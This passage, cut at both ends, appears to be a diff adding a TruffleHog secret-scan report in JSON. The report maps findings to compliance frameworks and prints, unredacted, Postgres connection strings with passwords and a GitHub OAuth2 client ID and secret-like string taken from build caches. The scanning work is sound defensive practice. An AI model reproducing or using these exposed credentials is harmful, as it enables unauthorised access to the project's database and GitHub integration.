postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": true, + "Raw": "postgresql://postgres:password@postgres:5432", + "RawV2": "postgresql://postgres:password@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "786bfda631317a71", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924", + "startLine": 0 + }, + "message": "postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924", + "line": 7 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": false, + "Raw": "postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432", + "RawV2": "postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "595d2f235b05e737", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc", + "startLine": 0 + }, + "message": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc", + "line": 9 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": true, + "Raw": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", + "RawV2": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3ed146267f450c31", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c", + "startLine": 0 + }, + "message": "postgresql://postgres:change-me@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c", + "line": 7 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": true, + "Raw": "postgresql://postgres:change-me@postgres:5432", + "RawV2": "postgresql://postgres:change-me@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2998e9823a9a5e07", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46", + "startLine": 0 + }, + "message": "postgresql://postgres:change-me@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46", + "line": 10 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": true, + "Raw": "postgresql://postgres:change-me@postgres:5432", + "RawV2": "postgresql://postgres:change-me@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d6855b7ba77520b3", + "ruleId": "GitHubOauth2", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz", + "startLine": 0 + }, + "message": "52813b1d8ad9af510d85", + "title": "GitHubOauth2 secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz", + "line": 10674 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 924, + "DetectorName": "GitHubOauth2", + "DetectorDescription": "GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.", + "DecoderName": "BASE64", + "Verified": false, + "VerificationFromCache": false, + "Raw": "52813b1d8ad9af510d85", + "RawV2": "52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/github/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "437a1c93140bc172", + "ruleId": "GitHubOauth2", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz", + "startLine": 0 + }, + "message": "52813b1d8ad9af510d85", + "title": "GitHubOauth2 secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz", + "line": 9955 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 924, + "DetectorName": "GitHubOauth2", + "DetectorDescription": "GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": false, + "Raw": "52813b1d8ad9af510d85", + "RawV2": "52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/github/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7029ffbb2c18937d", + "ruleId": "GitHubOauth2", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz", + "startLine": 0 + }, + "message": "52813b1d8ad9af510d85", + "title": "GitHubOauth2 secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz", + "line": 6254 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 924, + "DetectorName": "GitHubOauth2", + "DetectorDescription": "GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.", + "DecoderName": "BASE64", + "Verified": false, + "VerificationFromCache": true, + "Raw": "52813b1d8ad9af510d85", + "RawV2": "52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/github/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "992176a363e3d8a9", + "ruleId": "GitHubOauth2", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack", + "startLine": 0 + }, + "message": "52813b1d8ad9af510d85", + "title": "GitHubOauth2 secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack", + "line": 245909 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 924, + "DetectorName": "GitHubOauth2", + "DetectorDescription": "GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": true, + "Raw": "52813b1d8ad9af510d85", + "RawV2": "52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/github/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c1bd932c91cd4cda", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/@types/node/http.d.ts", + "startLine": 0 + }, + "message": "http://abc:xyz@example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/@types/node/http.d.ts", + "line": 1790 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": false, + "Raw": "http://abc:xyz@example.com", + "RawV2": "http://abc:xyz@example.com", + "Redacted": "http://abc:********@example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "65c35953dedc7b57", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/@types/node/https.d.ts", + "startLine": 0 + }, + "message": "https://abc:xyz@example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/@types/node/https.d.ts", + "line": 428 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": false, + "Raw": "https://abc:xyz@example.com", + "RawV2": "https://abc:xyz@example.com", + "Redacted": "https://abc:********@example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + 